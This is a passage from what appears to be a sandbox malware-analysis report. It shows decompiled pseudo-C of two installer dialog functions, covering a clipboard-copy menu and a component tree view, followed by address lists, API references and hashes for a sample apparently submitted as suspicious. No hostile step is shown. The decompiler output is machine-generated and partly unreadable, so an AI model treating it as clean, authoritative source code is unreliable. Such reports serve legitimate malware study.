				_t154 =  *0x423764; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004050B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405D1D(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420580;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42374c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423f88, 8);
							__eflags =  *0x42400c - _t149;
							if( *0x42400c == _t149) {
								E00404FE7( *((intOrPtr*)( *0x41fd50 + 0x34)), _t149);
							}
							E00403F90(1);
							goto L25;
						}
						 *0x41f948 = 2;
						E00403F90(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E0040401E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423750, _t149);
						ShowWindow(_t154, 8);
						E00403FEC(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f90; // 0x5bf9f8
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423750 = GetDlgItem(_a4, 0x403);
				 *0x423748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423764 = _t127;
				_v8 = _t127;
				E00403FEC( *0x423750);
				 *0x423754 = E00404889(4);
				 *0x42376c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403FB7(_a4);
				if(( *0x423f98 & 0x00000003) != 0) {
					ShowWindow( *0x423750, _t149);
					if(( *0x423f98 & 0x00000002) != 0) {
						 *0x423750 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403FEC( *0x423748);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f98 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                          0x0040512e
                          0x00405134
                          0x0040513d
                          0x00405140
                          0x004052d1
                          0x004052d8
                          0x004052fc
                          0x004052fc
                          0x00405302
                          0x0040530f
                          0x0040532d
                          0x0040532d
                          0x00405334
                          0x0040538b
                          0x0040538b
                          0x0040538f
                          0x00000000
                          0x00000000
                          0x00405391
                          0x00405394
                          0x00000000
                          0x00000000
                          0x0040539e
                          0x004053a4
                          0x004053a6
                          0x004053a9
                          0x004054a2
                          0x00000000
                          0x004054a2
                          0x004053b8
                          0x004053c4
                          0x004053ca
                          0x004053cd
                          0x004053d0
                          0x004053e5
                          0x004053e8
                          0x004053e8
                          0x004053eb
                          0x004053d2
                          0x004053d7
                          0x004053dd
                          0x004053e0
                          0x004053e0
                          0x004053fb
                          0x00405403
                          0x00405404
                          0x00405406
                          0x0040540f
                          0x00405412
                          0x00405419
                          0x00405420
                          0x00405428
                          0x00405428
                          0x00405436
                          0x0040543c
                          0x0040543f
                          0x0040543f
                          0x00405446
                          0x0040544c
                          0x00405455
                          0x0040545c
                          0x00405465
                          0x00405467
                          0x0040546a
                          0x00405479
                          0x0040547b
                          0x00405481
                          0x00405482
                          0x00405483
                          0x00405483
                          0x0040548b
                          0x00405496
                          0x0040549c
                          0x0040549c
                          0x00000000
                          0x00405406
                          0x00405336
                          0x0040533c
                          0x0040536c
                          0x0040536e
                          0x00405374
                          0x0040537f
                          0x0040537f
                          0x00405386
                          0x00000000
                          0x00405386
                          0x00405340
                          0x0040534a
                          0x00000000
                          0x00405311
                          0x00405311
                          0x00405317
                          0x0040534f
                          0x00000000
                          0x00405358
                          0x00405320
                          0x00405325
                          0x00405328
                          0x00000000
                          0x00405328
                          0x0040530f
                          0x00405146
                          0x0040514a
                          0x00405153
                          0x0040515a
                          0x0040515d
                          0x00405160
                          0x00405163
                          0x00405164
                          0x00405165
                          0x0040517e
                          0x00405181
                          0x0040518b
                          0x0040519a
                          0x004051a2
                          0x004051aa
                          0x004051af
                          0x004051b2
                          0x004051be
                          0x004051c7
                          0x004051d0
                          0x004051f3
                          0x004051f9
                          0x0040520a
                          0x0040520f
                          0x0040521d
                          0x0040522b
                          0x0040522b
                          0x00405230
                          0x0040523e
                          0x0040523e
                          0x00405243
                          0x00405246
                          0x0040524b
                          0x00405257
                          0x00405260
                          0x0040526d
                          0x0040527c
                          0x0040526f
                          0x00405274
                          0x00405274
                          0x00405288
                          0x00405288
                          0x0040529c
                          0x004052a5
                          0x004052ae
                          0x004052be
                          0x004052ca
                          0x004052ca
                          0x00000000

                          APIs
                          • GetDlgItem.USER32 ref: 00405184
                          • GetDlgItem.USER32 ref: 00405193
                          • GetClientRect.USER32 ref: 004051D0
                          • GetSystemMetrics.USER32 ref: 004051D8
                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051F9
                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040520A
                          • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040521D
                          • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 0040522B
                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040523E
                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405260
                          • ShowWindow.USER32(?,00000008), ref: 00405274
                          • GetDlgItem.USER32 ref: 00405295
                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052A5
                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052BE
                          • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004052CA
                          • GetDlgItem.USER32 ref: 004051A2
                            • Part of subcall function 00403FEC: SendMessageA.USER32(00000028,?,00000001,00403E1D), ref: 00403FFA
                          • GetDlgItem.USER32 ref: 004052E7
                          • CreateThread.KERNEL32 ref: 004052F5
                          • CloseHandle.KERNEL32(00000000), ref: 004052FC
                          • ShowWindow.USER32(00000000), ref: 00405320
                          • ShowWindow.USER32(00000000,00000008), ref: 00405325
                          • ShowWindow.USER32(00000008), ref: 0040536C
                          • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040539E
                          • CreatePopupMenu.USER32 ref: 004053AF
                          • AppendMenuA.USER32 ref: 004053C4
                          • GetWindowRect.USER32 ref: 004053D7
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053FB
                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405436
                          • OpenClipboard.USER32(00000000), ref: 00405446
                          • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040544C
                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405455
                          • GlobalLock.KERNEL32 ref: 0040545F
                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405473
                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040548B
                          • SetClipboardData.USER32 ref: 00405496
                          • CloseClipboard.USER32 ref: 0040549C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID: {
                          • API String ID: 590372296-366298937
                          • Opcode ID: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
                          • Instruction ID: e424ca0b0cb309e3be77902d9308c86312c6ad68702b37108e1cfd0bc7beca4c
                          • Opcode Fuzzy Hash: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
                          • Instruction Fuzzy Hash: 3FA13AB0900209BFDB11AFA1DD89AAE7F79FB44355F00803AFA05BA1E0C7795A41DF59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404936 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E00404936(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423fa8; // 0x5bfba4
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423f90; // 0x5bf9f8
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423f99 & 0x00000002;
							if(( *0x423f99 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004048B6(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423f98; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42055c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x420574;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42055c = _t315;
									 *0x420574 = _t315;
									 *0x423fe0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423f99 & 0x00000001;
										if(( *0x423f99 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423fac - _t315; // 0x3
										_v32 =  *0x420574;
										_t196 =  *0x423fa8; // 0x5bfba4
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42375c; // 0x5c191b
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E00404871(0x3ff, 0xfffffffb, E00404889(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x5bfbac
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x5bfbbc
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423fac; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x420574);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423fe0 = _a4;
					_t247 =  *0x423fac; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420574 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423f80, 0x6e);
					 *0x420568 =  *0x420568 | 0xffffffff;
					_v24 = _t250;
					 *0x420570 = SetWindowLongA(_v8, 0xfffffffc, E00404F37);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42055c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42055c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405D1D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403FB7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403FB7(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423fac - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420574 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420574 + _t318 * 4) = _t274;
									_t288 =  *( *0x420574 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423fac; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403FEC(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403FEC(_v12);
								L89:
								return E0040401E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                          0x00404954
                          0x0040495a
                          0x0040495c
                          0x00404962
                          0x00404968
                          0x0040496b
                          0x00404975
                          0x0040497e
                          0x00404981
                          0x00404984
                          0x00404bac
                          0x00404bac
                          0x00404bb3
                          0x00404bc7
                          0x00404bb5
                          0x00404bb7
                          0x00404bba
                          0x00404bbb
                          0x00404bc2
                          0x00404bc2
                          0x00404bca
                          0x00404bd3
                          0x00404bde
                          0x00404bde
                          0x00404be1
                          0x00404be4
                          0x00404bf3
                          0x00404bf3
                          0x00404bfa
                          0x00404c72
                          0x00404c72
                          0x00404c75
                          0x00404c77
                          0x00404c7a
                          0x00404c81
                          0x00404c8f
                          0x00404c8f
                          0x00404c91
                          0x00404c94
                          0x00404c9b
                          0x00404c9d
                          0x00404ca1
                          0x00404cbe
                          0x00404cc2
                          0x00404cc2
                          0x00404ca3
                          0x00404cb0
                          0x00404cb0
                          0x00404ca1
                          0x00404c9b
                          0x00000000
                          0x00404c75
                          0x00404bfc
                          0x00404bff
                          0x00404c0a
                          0x00404c0c
                          0x00404c0f
                          0x00404c16
                          0x00404c1b
                          0x00404c1d
                          0x00404c27
                          0x00404c27
                          0x00404c2b
                          0x00404c2d
                          0x00404c30
                          0x00404c32
                          0x00404c35
                          0x00404c4b
                          0x00404c4b
                          0x00404c37
                          0x00404c37
                          0x00404c3d
                          0x00404c3f
                          0x00404c46
                          0x00404c41
                          0x00404c41
                          0x00404c41
                          0x00404c3f
                          0x00404c4f
                          0x00404c51
                          0x00404c56
                          0x00404c5f
                          0x00404c60
                          0x00404c6a
                          0x00404c6a
                          0x00404c6c
                          0x00404c6f
                          0x00404c6f
                          0x00404c30
                          0x00000000
                          0x00404c1d
                          0x00404c01
                          0x00404c04
                          0x00404c08
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404c08
                          0x00404be6
                          0x00404bed
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404bd5
                          0x00404bd5
                          0x00404bd8
                          0x00404cc5
                          0x00404cc5
                          0x00404ccc
                          0x00404d40
                          0x00404d40
                          0x00404d47
                          0x00404d53
                          0x00404d53
                          0x00404d55
                          0x00404d5c
                          0x00404d5e
                          0x00404d63
                          0x00404d65
                          0x00404d68
                          0x00404d68
                          0x00404d6e
                          0x00404d73
                          0x00404d75
                          0x00404d78
                          0x00404d78
                          0x00404d7e
                          0x00404d84
                          0x00404d8a
                          0x00404d8a
                          0x00404d90
                          0x00404d97
                          0x00404ee4
                          0x00404ee4
                          0x00404eeb
                          0x00404eed
                          0x00404ef4
                          0x00404ef8
                          0x00404f05
                          0x00404f05
                          0x00404f08
                          0x00404f0e
                          0x00404f20
                          0x00404f20
                          0x00404ef4
                          0x00000000
                          0x00404d9d
                          0x00404d9f
                          0x00404da4
                          0x00404da7
                          0x00404dab
                          0x00404dab
                          0x00404db0
                          0x00404db3
                          0x00404df4
                          0x00404df6
                          0x00404e00
                          0x00404e06
                          0x00404e09
                          0x00404e0e
                          0x00404e15
                          0x00404e18
                          0x00404eba
                          0x00404ec0
                          0x00404ec6
                          0x00404ecb
                          0x00404ece
                          0x00404edf
                          0x00404edf
                          0x00000000
                          0x00404e1e
                          0x00404e1e
                          0x00404e1e
                          0x00404e21
                          0x00404e27
                          0x00404e2a
                          0x00404e2c
                          0x00404e2e
                          0x00404e30
                          0x00404e33
                          0x00404e36
                          0x00404e3d
                          0x00404e3f
                          0x00404e42
                          0x00404e49
                          0x00404e4c
                          0x00404e4c
                          0x00404e4c
                          0x00404e4c
                          0x00404e50
                          0x00404e53
                          0x00404e5f
                          0x00404e60
                          0x00404e63
                          0x00404e65
                          0x00404e65
                          0x00404e65
                          0x00404e55
                          0x00404e57
                          0x00404e57
                          0x00404e84
                          0x00404e84
                          0x00404e85
                          0x00404e91
                          0x00404ea0
                          0x00404ea0
                          0x00404ea2
                          0x00404ea5
                          0x00404eae
                          0x00404eae
                          0x00000000
                          0x00404e21
                          0x00404db5
                          0x00404dc0
                          0x00404dc3
                          0x00404dc8
                          0x00404dca
                          0x00404dcc
                          0x00404dce
                          0x00404dde
                          0x00404de8
                          0x00404dea
                          0x00404ded
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404dd0
                          0x00404dd0
                          0x00404dd0
                          0x00404dd3
                          0x00404dd6
                          0x00404dd8
                          0x00404dd8
                          0x00404dd8
                          0x00404dd9
                          0x00404dda
                          0x00404dda
                          0x00000000
                          0x00404dd0
                          0x00404db3
                          0x00404d97
                          0x00404cce
                          0x00404cd4
                          0x00000000
                          0x00000000
                          0x00404ce0
                          0x00404ce4
                          0x00000000
                          0x00000000
                          0x00404cf4
                          0x00404cf6
                          0x00404cf9
                          0x00000000
                          0x00000000
                          0x00404d0b
                          0x00404d0d
                          0x00404d10
                          0x00404d1a
                          0x00404d1c
                          0x00404d1d
                          0x00404d1e
                          0x00404d2d
                          0x00404d2f
                          0x00404d36
                          0x00404d39
                          0x00000000
                          0x00404d39
                          0x00404d12
                          0x00404d15
                          0x00404d18
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404d18
                          0x00000000
                          0x00404bd8
                          0x0040498a
                          0x0040498f
                          0x00404994
                          0x00404999
                          0x0040499a
                          0x004049a3
                          0x004049ae
                          0x004049b9
                          0x004049bf
                          0x004049cd
                          0x004049e2
                          0x004049e7
                          0x004049f2
                          0x004049fb
                          0x00404a10
                          0x00404a21
                          0x00404a2e
                          0x00404a2e
                          0x00404a33
                          0x00404a39
                          0x00404a3b
                          0x00404a3e
                          0x00404a43
                          0x00404a48
                          0x00404a4a
                          0x00404a4a
                          0x00404a6a
                          0x00404a6a
                          0x00404a6c
                          0x00404a6d
                          0x00404a72
                          0x00404a75
                          0x00404a78
                          0x00404a7c
                          0x00404a81
                          0x00404a86
                          0x00404a8a
                          0x00404a8f
                          0x00404a94
                          0x00404a96
